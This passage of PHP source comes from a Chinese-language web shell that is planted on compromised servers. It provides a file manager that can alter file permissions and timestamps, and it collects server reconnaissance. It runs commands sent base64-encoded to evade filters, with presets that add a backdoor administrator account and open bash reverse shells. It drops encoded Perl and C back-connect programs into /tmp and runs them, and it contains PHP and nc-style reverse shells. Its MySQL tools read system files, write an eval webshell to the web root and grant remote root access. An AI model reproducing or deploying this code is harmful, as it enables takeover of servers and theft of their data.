2059 html_n('</form></td></tr></table><form method="POST" name="fileall" id="fileall" action="?eanver=main&path=' . $path . '"><table width="100%" border=0 bgcolor="#555555"><tr height="25"><td width="45%"><b>');
2060 html_a('?eanver=main&path=' . uppath($path), "<b>上级目录</b>");
2061 html_n('</b></td><td align="center" width="10%"><b>操作</b></td><td align="center" width="5%"><b>文件属性</b></td><td align="center" width="8%"><b>(' . get_current_user() . ')用户|组</b></td><td align="center" width="10%"><b>修改时间</b></td><td align="center" width="10%"><b>文件大小</b></td></tr>');
2062
2063 //显示文件的一些属性
2064 while ($dirs = @$dir->read()) {
2065 if ($dirs == '.' or $dirs == '..') {
2066 continue;
2067 }
2068 $dirpath = str_path("$path/$dirs");
2069 if (is_dir($dirpath)) {
2070 $perm = substr(base_convert(fileperms($dirpath), 10, 8), -4);
2071 $filetime = @date('Y-m-d H:i:s', @filemtime($dirpath));
2072 $dirpath = urlencode($dirpath);
2073 html_n('<tr height="25"><td><input type="checkbox" name="files[]" value="' . $dirs . '">');
2074 html_img("dir");
2075 html_a('?eanver=main&path=' . $dirpath, $dirs);
2076 html_n('</td><td align="center"><a href="#" onClick="rusurechk(\'' . $dirs . "','?eanver=rename&p=" . $dirpath . "&newname=');return false;\">改名</a> <a href=\"#\" onClick=\"rusuredel('" . $dirs . "','?eanver=deltree&p=" . $dirpath . "');return false;\">删除</a>");
2077 html_a('?pack=' . $dirpath, "打包");
2078 html_n("</td><td align=\"center\"><a href=\"javascript:SubmitAttran('修改所选文件属性为:','" . $dirs . "','" . $perm . "','c');\" title='修改属性'>" . $perm . '</a></td><td align="center">' . GetFileOwner("$path/$dirs") . ":" . GetFileGroup("$path/$dirs"));
2079 html_n("</td><td align='center'><a href=\"javascript:SubmitAttran('修改所选文件时间为:','" . $dirs . "','" . $filetime . "','d');\" title='修改时间'>" . $filetime . "</a></td><td align='center'></td></tr>");
2080 $NUM_D++;
2081 }
2082 }
2083
2084 @$dir->rewind();
2085 while ($files = @$dir->read()) {
2086 if ($files == '.' or $files == '..') {
2087 continue;
2088 }
2089 $filepath = str_path("$path/$files");
2090 if (!is_dir($filepath)) {
2091 $fsize = @filesize($filepath);
2092 $fsize = @File_Size(sprintf("%u", $fsize));
2093 $perm = substr(base_convert(fileperms($filepath), 10, 8), -4);
2094 $filetime = @date('Y-m-d H:i:s', @filemtime($filepath));
2095 $Fileurls = str_replace(File_Str($ROOT_DIR . '/'), $GETURL, $filepath);
2096 $todir = $ROOT_DIR . '/';
2097 $filepath = urlencode($filepath);
2098 $it = substr($filepath, -3);
2099 html_n('<tr height="25"><td><input type="checkbox" name="files[]" value="' . $files . '">');
2100 html_img(css_showimg($files));
2101 html_a($Fileurls, $files, 'target="_blank"');
2102 html_n('</td><td align="center">');
2103
2104 if (($it == '.gz') or ($it == 'zip') or ($it == 'tar') or ($it == '.7z')) {
2105 html_a("?type=1&unzip=" . $filepath, "Z解1", 'title="手写的PHP解压' . $files . "\" onClick=\"rusurechk('" . $todir . "','?tt=1&unzip=" . $filepath . '&todir=\');return false;"');
2106 html_a("?type=2&unzip=" . $filepath, "Z解2", 'title="PHP自带的ZIP解压' . $files . "\" onClick=\"rusurechk('" . $todir . "','?tt=2&unzip=" . $filepath . '&todir=\');return false;"');
2107 html_a("?type=3&unzip=" . $filepath, "T解", 'title="PHP自带的tar解压' . $files . ',针对LINUX文件属性权限用,比如0777,0755" onClick="rusurechk(\'' . $todir . "','?tt=3&unzip=" . $filepath . '&todir=\');return false;"');
2108 } else {
2109 html_a("?eanver=editr&p=" . $filepath, "编辑", "title=\"编辑" . $files . '"');
2110 }
2111 html_n("<a href=\"#\" onClick=\"rusurechk('" . $files . "','?eanver=rename&p=" . $filepath . "&newname=');return false;\">改名</a> <a href=\"#\" onClick=\"rusuredel('" . $files . "','?eanver=del&p=" . $filepath . "');return false;\">删除</a> <a href=\"#\" onClick=\"rusurechk('" . urldecode($filepath) . "','?eanver=copy&p=" . $filepath . "&newcopy=');return false;\">复制</a></td><td align=\"center\"><a href=\"javascript:SubmitAttran('修改所选文件属性为:','" . $files . "','" . $perm . "','c');\" title='修改属性'>" . $perm . "</a></td><td align=\"center\">" . GetFileOwner("$path/$files") . ':' . GetFileGroup("$path/$files"));
2112 html_n("</td><td align='center'><a href=\"javascript:SubmitAttran('修改所选文件时间为:','" . $files . "','" . $filetime . "','d');\" title='修改时间'>" . $filetime . "</a></td><td align='center'>");
2113 html_a("?down=" . $filepath, $fsize, "title=\"下载" . $files . '"');
2114 html_n("</td></tr>");
2115 $NUM_F++;
2116 }
2117 }
2118 @$dir->close();
2119 $Filetime = gmdate('Y-m-d H:i:s', time() + 3600 * 8);
2120 html_n("</table>
2121<div class=\"actall\"> <input type=\"hidden\" id=\"actall\" name=\"actall\" value=\"\">
2122<input type=\"hidden\" id=\"attam\" name=\"attam\" value=\"\">
2123<input type=\"hidden\" id=\"inver\" name=\"inver\" value=\"undefined\">
2124<input type=\"hidden\" id=\"file\" name=\"file\" value=\"undefined\">
2125<input name=\"chkall\" value=\"on\" type=\"checkbox\" onclick=\"CheckAll(this.form);\">
2126<input type=\"button\" value=\"复制\" onclick=\"SubmitUrl('复制所选文件到路径: ','" . $REAL_DIR . "','a');return false;\">
2127<input type=\"button\" value=\"删除\" onclick=\"Delok('所选文件','b');return false;\">
2128<input type=\"button\" value=\"属性\" onclick=\"SubmitUrl('修改所选文件属性值为: ','0666','c');return false;\">
2129<input type=\"button\" value=\"时间\" onclick=\"CheckDate('" . $Filetime . "','d');return false;\">
2130<input type=\"button\" value=\"打包\" onclick=\"SubmitUrl('打包并下载所选文件下载名为: ','" . $path . '/' . $_SERVER['SERVER_NAME'] . ".tar.gz','e');return false;\">
2131目录(" . $NUM_D . ") / 文件(" . $NUM_F . ")</div>
2132</form> ");
2133 break;
2134
2135
2136 case "editr":
2137 echo("<script>");
2138 html_base();
2139 echo("</script>");
2140 css_js("2");
2141 if (!empty($_POST['uploadt'])) {
2142 echo @copy($_FILES['upfilet']['tmp_name'], str_path($p . '/' . $_FILES['upfilet']['name'])) ? html_a("?eanver=main", $_FILES['upfilet']['name'] . ' ' . $msg[2]) : msg($msg[3]);
2143 die("<meta http-equiv=\"refresh\" content=\"1;URL=?eanver=main&path=" . urlencode($p) . '">');
2144 }
2145
2146 if (!empty($_GET['redir'])) {
2147 $name = $_GET['name'];
2148 $newdir = str_path($p . '/' . $name);
2149 @mkdir($newdir, 0777) ? html_a("?eanver=main", $name . ' ' . $msg[0]) : msg($msg[1]);
2150 die("<meta http-equiv=\"refresh\" content=\"1;URL=?eanver=main&path=" . urlencode($p) . '">');
2151 }
2152 if (!empty($_GET['refile'])) {
2153 $name = $_GET['name'];
2154 $jspath = urlencode($p . '/' . $name);
2155 $pp = urlencode($p);
2156 $p = str_path($p . '/' . $name);
2157 $FILE_CODE = "";
2158 $charset = 'utf8';
2159 $FILE_TIME = date('Y-m-d H:i:s', time() + 3600 * 8);
2160 if (@file_exists($p)) {
2161 echo "发现目录下有\"同名\"文件,更换编码可以截入<br>";
2162 }
2163 } else {
2164 $jspath = urlencode($p);
2165 $FILE_TIME = date('Y-m-d H:i:s', filemtime($p));
2166 $FILE_CODE = file_get_contents($p);
2167 if (substr(PHP_VERSION, 0, 1) >= 5) {
2168 if (empty($_GET['charset'])) {
2169 if (TestUtf8($FILE_CODE) > 1) {
2170 $charset = 'UTF-8';
2171 $FILE_CODE = iconv("UTF-8", "utf8//IGNORE", $FILE_CODE);
2172 } else {
2173 $charset = 'utf8';
2174 }
2175 } else {
2176 if ($_GET['charset'] == 'utf8') {
2177 $charset = 'utf8';
2178 } else {
2179 $charset = $_GET['charset'];
2180 $FILE_CODE = iconv($_GET['charset'], "utf8//IGNORE", $FILE_CODE);
2181 }
2182 }
2183 }
2184 $FILE_CODE2 = $FILE_CODE;
2185 $FILE_CODE = htmlspecialchars($FILE_CODE);
2186 if ($FILE_CODE == "") {
2187 $FILE_CODE = htmlspecialchars($FILE_CODE2, ENT_COMPAT, 'ISO-8859-1');
2188 }
2189 }
2190 html_n("<div class=\"actall\">查找内容: <input name=\"searchs\" type=\"text\" value=\"\" style=\"width:500px;\">
2191<input type=\"button\" value=\"查找\" onclick=\"search(searchs.value)\"></div>
2192<form method='POST' id=\"editor\" action='?eanver=main&path=" . $pp . "'>
2193<div class=\"actall\">
2194<input type=\"text\" name=\"newfile\" id=\"newfile\" value=\"" . $p . "\" style=\"width:750px;\">指定编码:<input name=\"charset\" id=\"charset\" value=\"" . $charset . "\" Type=\"text\" style=\"width:80px;\" onkeydown=\"if(event.keyCode==13)window.location='?eanver=editr&p=" . $jspath . "&charset='+this.value;\">
2195<input type=\"button\" value=\"选择\" onclick=\"window.location='?eanver=editr&p=" . $jspath . "&charset='+this.form.charset.value;\" style=\"width:50px;\">");
2196 html_select(array("utf8" => "utf8", "UTF-8" => "UTF-8", "BIG5" => "BIG5", "EUC-KR" => "EUC-KR", "EUC-JP" => "EUC-JP", "SHIFT-JIS" => "SHIFT-JIS", "WINDOWS-874" => "WINDOWS-874", "ISO-8859-1" => "ISO-8859-1"), $charset, "onchange=\"window.location='?eanver=editr&p={$jspath}&charset='+options[selectedIndex].value;\"");
2197 html_n("</div>
2198<div class=\"actall\"><textarea name=\"txt\" id=\"txt\" style=\"width:100%;height:380px;\">" . $FILE_CODE . "</textarea></div>
2199<div class=\"actall\">文件修改时间 <input type=\"text\" name=\"time\" id=\"mtime\" value=\"" . $FILE_TIME . "\" style=\"width:150px;\"> <input type=\"checkbox\" name=\"bin\" value=\"wb+\" size=\"\" checked>以二进制形式保存文件(建议使用)</div>
2200<div class=\"actall\"><input type=\"button\" value=\"保存\" onclick=\"CheckDate();\" style=\"width:80px;\"><input name='reset' type='reset' value='重置'>
2201<input type=\"button\" value=\"返回\" onclick=\"window.location='?eanver=main&path=" . $pp . "';\" style=\"width:80px;\"></div>
2202</form>");
2203 break;
2204 case "rename":
2205 html_n("<tr><td>");
2206 $newname = urldecode($pp) . '/' . urlencode($_GET['newname']);
2207 @rename($p, $newname) ? html_a("?eanver=main&path=$pp", urlencode($_GET['newname']) . ' ' . $msg[4]) : msg($msg[5]);
2208 die("<meta http-equiv=\"refresh\" content=\"1;URL=?eanver=main&path=" . $pp . '">');
2209 break;
2210 case "deltree":
2211 html_n("<tr><td>");
2212 delDirAndFile($p);
2213 !is_dir($p) ? html_a("?eanver=main&path=$pp", $p . ' ' . $msg[6]) : msg($msg[7]);
2214 die("<meta http-equiv=\"refresh\" content=\"1;URL=?eanver=main&path=" . $pp . '">');
2215 break;
2216 case "del":
2217 html_n("<tr><td>");
2218 delDirAndFile($p);
2219 !is_file($p) ? html_a("?eanver=main&path=$pp", $p . ' ' . $msg[6]) : msg($msg[7]);
2220 die("<meta http-equiv=\"refresh\" content=\"1;URL=?eanver=main&path=" . $pp . '">');
2221 break;
2222 case "copy":
2223 html_n("<tr><td>");
2224 $newpath = explode('/', $_GET['newcopy']);
2225 $pathr[0] = $newpath[0];
2226 for ($i = 1; $i < count($newpath); $i++) {
2227 $pathr[] = urlencode($newpath[$i]);
2228 }
2229 $newcopy = implode('/', $pathr);
2230 @copy($p, $newcopy) ? html_a("?eanver=main&path=$pp", $newcopy . ' ' . $msg[4]) : msg($msg[5]);
2231 die("<meta http-equiv=\"refresh\" content=\"1;URL=?eanver=main&path=" . $pp . '">');
2232 break;
2233 case "perm":
2234 html_n("<form method='POST'><tr><td>" . $p . " 属性为: ");
2235 if (is_dir($p)) {
2236 html_select(array("0777" => "0777", "0755" => "0755", "0555" => "0555"), $_GET['chmod']);
2237 } else {
2238 html_select(array("0666" => "0666", "0644" => "0644", "0444" => "0444"), $_GET['chmod']);
2239 }
2240 html_input("submit", "save", "修改");
2241 back();
2242
2243 if ($_POST['class']) {
2244 switch ($_POST['class']) {
2245 case "0777":
2246 $change = @chmod($p, 0777);
2247 break;
2248 case "0755":
2249 $change = @chmod($p, 0755);
2250 break;
2251 case "0555":
2252 $change = @chmod($p, 0555);
2253 break;
2254 case "0666":
2255 $change = @chmod($p, 0666);
2256 break;
2257 case "0644":
2258 $change = @chmod($p, 0644);
2259 break;
2260 case "0444":
2261 $change = @chmod($p, 0444);
2262 break;
2263 }
2264 $change ? html_a("?eanver=main&path=$pp", $msg[4]) : msg($msg[5]);
2265 die("<meta http-equiv=\"refresh\" content=\"1;URL=?eanver=main&path=" . $pp . '">');
2266 }
2267 html_n("</td></tr></form>");
2268 break;
2269 case "info_f":
2270 $dis_func = get_cfg_var("disable_functions");
2271 $upsize = get_cfg_var("file_uploads") ? get_cfg_var("upload_max_filesize") : "不允许上传";
2272 if ($dis_func == "") {
2273 $dis_func = "No";
2274 } else {
2275 $dis_func = str_replace(" ", "<br>", $dis_func);
2276 $dis_func = str_replace(",", "<br>", $dis_func);
2277 }
2278 $phpinfo = (!preg_match("/phpinfo/", $dis_func)) ? "Yes" : "No";
2279 $info = array(array("服务器时间", date("Y-m-d h:i:s", time())), array("服务器域名", "<a href=\"http://" . $_SERVER['SERVER_NAME'] . "\" target=\"_blank\">" . $_SERVER['SERVER_NAME'] . "</a>"), array("服务器IP地址", gethostbyname($_SERVER['SERVER_NAME'])), array("服务器操作系统", PHP_OS), array("服务器操作系统文字编码", $_SERVER['HTTP_ACCEPT_LANGUAGE']), array("服务器解译引擎", $_SERVER['SERVER_SOFTWARE']), array("你的IP", get_proxy_ip()), array("Web服务端口", $_SERVER['SERVER_PORT']), array("PHP运行方式", strtoupper(php_sapi_name())), array("PHP版本", PHP_VERSION), array("运行于安全模式", Info_Cfg("safemode")), array("本文件路径", myaddress), array("允许使用 URL 打开文件 allow_url_fopen", Info_Cfg("allow_url_fopen")), array("允许使用curl_exec", Info_Fun("curl_exec")), array("允许动态加载链接库 enable_dl", Info_Cfg("enable_dl")), array("显示错误信息 display_errors", Info_Cfg("display_errors")), array("自动定义全局变量 register_globals", Info_Cfg("register_globals")), array("magic_quotes_gpc", Info_Cfg("magic_quotes_gpc")), array("程序最多允许使用内存量 memory_limit", Info_Cfg("memory_limit")), array("POST最大字节数 post_max_size", Info_Cfg("post_max_size")), array("允许最大上传文件 upload_max_filesize", $upsize), array("程序最长运行时间 max_execution_time", Info_Cfg("max_execution_time") . "秒"), array("被禁用的函数 disable_functions", $dis_func), array("phpinfo()", $phpinfo), array("目前还有空余空间diskfreespace", intval(diskfreespace(".") / (1024 * 1024)) . 'Mb'), array("图形处理 GD Library", Info_Fun("imageline")), array("IMAP电子邮件系统", Info_Fun("imap_close")), array("MySQL数据库", Info_Fun("mysql_close")), array("SyBase数据库", Info_Fun("sybase_close")), array("Oracle数据库", Info_Fun("ora_close")), array("Oracle 8 数据库", Info_Fun("OCILogOff")), array("PREL相容语法 PCRE", Info_Fun("preg_match")), array("PDF文档支持", Info_Fun("pdf_close")), array("Postgre SQL数据库", Info_Fun("pg_close")), array("SNMP网络管理协议", Info_Fun("snmpget")), array("压缩文件支持(Zlib)", Info_Fun("gzclose")), array("XML解析", Info_Fun("xml_set_object")), array("FTP", Info_Fun("ftp_login")), array("ODBC数据库连接", Info_Fun("odbc_close")), array("Session支持", Info_Fun("session_start")), array("Socket支持", Info_Fun("fsockopen")),);
2280
2281 echo "<table width=\"100%\" border=\"0\">";
2282 for ($i = 0; $i < count($info); $i++) {
2283 echo "<tr><td width=\"40%\">" . $info[$i][0] . "</td><td>" . $info[$i][1] . "</td></tr>" . "\n";
2284 }
2285 $registry_proxystring = "";
2286 $Telnet = "";
2287 $PcAnywhere = "";
2288 $system = strtoupper(substr(PHP_OS, 0, 3));
2289 if ($system == "WIN") {
2290 try {
2291 $shell = new COM("WScript.Shell") or die("This thing requires Windows Scripting Host");
2292 $registry_proxystring = $shell->RegRead("HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\Wds\\rdpwd\\Tds\\tcp\\PortNumber");
2293 $Telnet = $shell->RegRead("HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\TelnetServer\\1.0\\TelnetPort");
2294 $PcAnywhere = $shell->RegRead("HKEY_LOCAL_MACHINE\\SOFTWARE\\Symantec\\pcAnywhere\\CurrentVersion\\System\\TCPIPDataPort");
2295 } catch (Exception $e) {
2296 }
2297 }
2298
2299 echo "<tr><td width=\"40%\">Terminal Service端口为</td><td>" . $registry_proxystring . "</td></tr>" . "\n";
2300 echo "<tr><td width=\"40%\">Telnet端口为</td><td>" . $Telnet . "</td></tr>" . "\n";
2301 echo "<tr><td width=\"40%\">PcAnywhere端口为</td><td>" . $PcAnywhere . "</td></tr>" . "\n";
2302 echo "</table>";
2303 break;
2304 case "cmd":
2305 $res = "回显窗口";
2306 $cmd = "whoami";
2307 if (!empty($_POST['cmd'])) {
2308 $res = Exec_Run(base64_decode($_POST['cmd']));
2309 $cmd = htmlspecialchars(base64_decode($_POST['cmd']));
2310 }
2311 html_n("<script language=\"javascript\">
2312function sFull(i){
2313 Str = new Array(11);
2314 Str[0] = \"dir\";
2315 Str[1] = \"net user envl envl /add\";
2316 Str[2] = \"net localgroup administrators envl /add\";
2317 Str[3] = \"netstat -ano\";
2318 Str[4] = \"ipconfig\";
2319 Str[5] = \"copy c:\\1.php d:\\2.php\";
2320 Str[6] = \"tftp -i " . $_SERVER["REMOTE_ADDR"] . "get server.exe c:\\server.exe\";
2321 Str[7] = \"0<&123;exec 123<>/dev/tcp/" . $_SERVER["REMOTE_ADDR"] . "/12666; sh <&123 >&123 2>&123\";
2322 Str[8] = \"bash -i >& /dev/tcp/" . $_SERVER["REMOTE_ADDR"] . "/12366 0>&1\";
2323 Str[9] = \"tasklist -svc\";
2324 Str[10] = \"netstat -tlnp\";
2325 document.getElementById('cmd').value = Str[i];
2326 return true;
2327}");
2328 html_base();
2329 html_n("function SubmitUrl(){
2330 document.getElementById('cmd').value = base64encode(document.getElementById('cmd').value);
2331 document.getElementById('gform').submit();
2332}
2333</script>
2334<form method=\"POST\" name=\"gform\" id=\"gform\" ><center><div class=\"actall\">执行命令新增很多隐藏函数,这个执行不了,除了反弹出来,绝对没有任何工具能执行命令!外加使用BASE64加密提交,防止被拦</div><div class=\"actall\">
2335命令参数 <input type=\"text\" name=\"cmd\" id=\"cmd\" value=\"" . $cmd . "\" onkeydown=\"if(event.keyCode==13)SubmitUrl();\" style=\"width:399px;\">
2336<select onchange='return sFull(options[selectedIndex].value)'>
2337<option value=\"0\" selected>--命令集合--</option>
2338<option value=\"1\">添加管理员</option>
2339<option value=\"2\">设为管理组</option>
2340<option value=\"3\">查看端口</option>
2341<option value=\"4\">查看地址</option>
2342<option value=\"5\">复制文件</option>
2343<option value=\"6\">FTP下载</option>
2344<option value=\"7\">Linux反弹</option>
2345<option value=\"8\">bash反弹</option>
2346<option value=\"9\">查看进程</option>
2347<option value=\"10\">Linux端口</option>
2348</select>
2349 <input type=\"button\" value=\"执行\" onclick=\"SubmitUrl();\" style=\"width:80px;\">
2350</div>
2351<div class=\"actall\"><textarea name=\"show\" style=\"width:660px;height:399px;\">" . $res . "</textarea></div></center>
2352</form>");
2353 break;
2354 case "linux":
2355 $yourip = isset($_COOKIE['yourip']) ? $_COOKIE['yourip'] : getenv('REMOTE_ADDR');
2356 $yourport = isset($_COOKIE['yourport']) ? $_COOKIE['yourport'] : "12388";
2357 $system = strtoupper(substr(PHP_OS, 0, 3));
2358 html_n("<div class=\"actall\">使用方法:<br>
2359 先在自己电脑运行\"nc -vv -l 12388\"<br>
2360 然后在此填写你电脑的IP,点连接!此反弹很全很实用!包括NC反弹!</div>
2361<form method=\"POST\" name=\"kform\" id=\"kform\">
2362<div class=\"actall\">你的地址 <input type=\"text\" name=\"yourip\" value=\"" . $yourip . "\" style=\"width:400px\"></div>
2363<div class=\"actall\">连接端口 <input type=\"text\" name=\"yourport\" value=\"" . $yourport . "\" style=\"width:400px\"></div>
2364<div class=\"actall\">执行方式 <select name=\"use\" >
2365<option value=\"perl\">Perl</option>
2366<option value=\"c\">C</option>
2367<option value=\"php\">PHP</option>
2368<option value=\"nc\">NC</option>
2369</select></div>
2370<div class=\"actall\"><input type=\"submit\" value=\"开始连接\" style=\"width:80px;\"></div></form>");
2371 if ((!empty($_POST['yourip'])) && (!empty($_POST['yourport']))) {
2372 setcookie('yourip', $_POST['yourip']);
2373 setcookie('yourport', $_POST['yourport']);
2374 echo "<div class=\"actall\">";
2375 if ($_POST['use'] == 'perl') {
2376 $back_connect_pl = "IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj" . "aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR" . "hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT" . "sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI" . "kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi" . "KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl" . "OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
2377 echo File_Write("/tmp/envl_bc", base64_decode($back_connect_pl), 'wb') ? "创建/tmp/envl_bc成功<br>" : "创建/tmp/envl_bc失败<br>";
2378 $perlpath = Exec_Run('which perl');
2379 $perlpath = $perlpath ? chop($perlpath) : 'perl';
2380 @unlink("/tmp/envl_bc.c");
2381 echo Exec_Run($perlpath . " /tmp/envl_bc " . $_POST['yourip'] . ' ' . $_POST['yourport'] . ' &') ? "nc -vv -l " . $_POST['yourport'] : "执行命令失败";
2382 }
2383 if ($_POST['use'] == 'c') {
2384 $back_connect_c = "I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC" . "BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb" . "SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd" . "KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ" . "sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC" . "Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D" . "QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp" . "Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==";
2385 echo File_Write("/tmp/envl_bc.c", base64_decode($back_connect_c), 'wb') ? "创建/tmp/envl_bc.c成功<br>" : "创建/tmp/envl_bc.c失败<br>";
2386 $res = Exec_Run("gcc -o /tmp/envl_bc /tmp/envl_bc.c");
2387 @unlink("/tmp/envl_bc.c");
2388 echo Exec_Run("/tmp/envl_bc " . $_POST['yourip'] . ' ' . $_POST['yourport'] . ' &') ? "nc -vv -l " . $_POST['yourport'] : "执行命令失败";
2389 }
2390 if ($_POST['use'] == 'php') {
2391 if (!extension_loaded('sockets')) {
2392 if ($system == 'WIN') {
2393 @dl('php_sockets.dll') or die("Can't load socket");
2394 } else {
2395 @dl('sockets.so') or die("Can't load socket");
2396 }
2397 }
2398 if ($system == "WIN") {
2399 $env = array('path' => "c:\\windows\\system32");
2400 } else {
2401 $env = array('PATH' => "/bin:/usr/bin:/usr/local/bin:/usr/local/sbin:/usr/sbin");
2402 }
2403 $descriptorspec = array(0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "w"));
2404 $host = $_POST['yourip'];
2405 $port = $_POST['yourport'];
2406 $host = gethostbyname($host);
2407 $proto = getprotobyname("tcp");
2408 if (($sock = socket_create(AF_INET, SOCK_STREAM, $proto)) < 0) {
2409 die("Socket创建失败");
2410 }
2411 if (($ret = socket_connect($sock, $host, $port)) < 0) {
2412 die("连接失败");
2413 } else {
2414 $message = "----------------------PHP反弹连接----------------------" . "\n";
2415 socket_write($sock, $message, strlen($message));
2416 $cwd = str_replace('\\', '/', dirname(__FILE__));
2417 while ($cmd = socket_read($sock, 65535, $proto)) {
2418 if (trim(strtolower($cmd)) == "exit") {
2419 socket_write($sock, "Bye\n");
2420 exit;
2421 } else {
2422 $process = proc_open($cmd, $descriptorspec, $pipes, $cwd, $env);
2423 if (is_resource($process)) {
2424 fwrite($pipes[0], $cmd);
2425 fclose($pipes[0]);
2426 $msg = stream_get_contents($pipes[1]);
2427 socket_write($sock, $msg, strlen($msg));
2428 fclose($pipes[1]);
2429 $msg = stream_get_contents($pipes[2]);
2430 socket_write($sock, $msg, strlen($msg));
2431 $return_value = proc_close($process);
2432 }
2433 }
2434 }
2435 }
2436 }
2437 if ($_POST['use'] == 'nc') {
2438 echo "<div class=\"actall\">";
2439 $mip = $_POST['yourip'];
2440 $bport = $_POST['yourport'];
2441 $fp = fsockopen($mip, $bport, $errno, $errstr);
2442 if (!$fp) {
2443 $result = "Error: could not open socket connection";
2444 } else {
2445 fputs($fp, "\n*********************************************\n " . "is ok" . "\n*********************************************\n\n");
2446 while (!feof($fp)) {
2447 fputs($fp, "[Tr0yShell]> ");
2448 $result = fgets($fp, 4096);
2449 $message = `$result`;
2450 fputs($fp, "Shellresult:\n\n" . $message . "\n");
2451 }
2452 fclose($fp);
2453 }
2454 echo "</div>";
2455 }
2456 echo "<br>你可以尝试连接端口 (nc -vv -l " . $_POST['yourport'] . ') ';
2457 }
2458 break;
2459 case "sqlshell":
2460 $MSG_BOX = '';
2461 $mhost = 'localhost';
2462 $muser = 'root';
2463 $mport = '3306';
2464 $mpass = 'root';
2465 $mdata = 'mysql';
2466 $msql = "select version();";
2467 if (isset($_POST['mhost']) && isset($_POST['muser'])) {
2468 $mhost = $_POST['mhost'];
2469 $muser = $_POST['muser'];
2470 $mpass = $_POST['mpass'];
2471 $mdata = $_POST['mdata'];
2472 $mport = $_POST['mport'];
2473 if ($conn = @mysql_connect($mhost . ':' . $mport, $muser, $mpass)) {
2474 @mysql_select_db($mdata);
2475 } else {
2476 $MSG_BOX = "连接MYSQL失败";
2477 }
2478 }
2479 $downfile = "c:/windows/repair/sam";
2480 if (!empty($_POST['downfile'])) {
2481 $downfile = File_Str($_POST['downfile']);
2482 $binpath = bin2hex($downfile);
2483 $query = "select load_file(0x" . $binpath . ')';
2484 if ($result = @mysql_query($query, $conn)) {
2485 $k = 0;
2486 $downcode = '';
2487 while ($row = @mysql_fetch_array($result)) {
2488 $downcode .= $row[$k];
2489 $k++;
2490 }
2491 $filedown = basename($downfile);
2492 if (!$filedown) {
2493 $filedown = "envl.tmp";
2494 }
2495 $array = explode('.', $filedown);
2496 $arrayend = array_pop($array);
2497 header("Content-type: application/x-" . $arrayend);
2498 header("Content-Disposition: attachment; filename=" . $filedown);
2499 header("Content-Length: " . strlen($downcode));
2500 echo $downcode;
2501 exit;
2502 } else {
2503 $MSG_BOX = "下载文件失败";
2504 }
2505 }
2506 $o = isset($_GET['o']) ? $_GET['o'] : '';
2507 html_n("<script language=\"javascript\">
2508function nFull(i){
2509 Str = new Array(11);
2510 Str[0] = \"select version();\";
2511 Str[1] = \"select load_file(0x633A5C5C77696E646F77735C73797374656D33325C5C696E65747372765C5C6D657461626173652E786D6C) FROM user into outfile '" . str_replace('\\', '/', $_SERVER['DOCUMENT_ROOT']) . "/iis.txt'\";
2512 Str[2] = \"select '<?php eval(\$_POST['cmd']);?>' into outfile '" . str_replace('\\', '/', $_SERVER['DOCUMENT_ROOT']) . "/shell.php';\";
2513 Str[3] = \"GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED BY '123456' WITH GRANT OPTION;\";
2514 nform.msql.value = Str[i];
2515 return true;
2516}");
2517 html_base();
2518 html_n("function SubmitUrl(){
2519 document.getElementById('msql').value = base64encode(document.getElementById('msql').value);
2520 document.getElementById('nform').submit();
2521}
2522</script>
2523<form method=\"POST\" name=\"nform\" id=\"nform\">
2524<center><div class=\"actall\"><a href=\"?eanver=sqlshell\">[MYSQL执行语句]</a>
2525<a href=\"?eanver=sqlshell&o=u\">[MYSQL上传文件]</a>
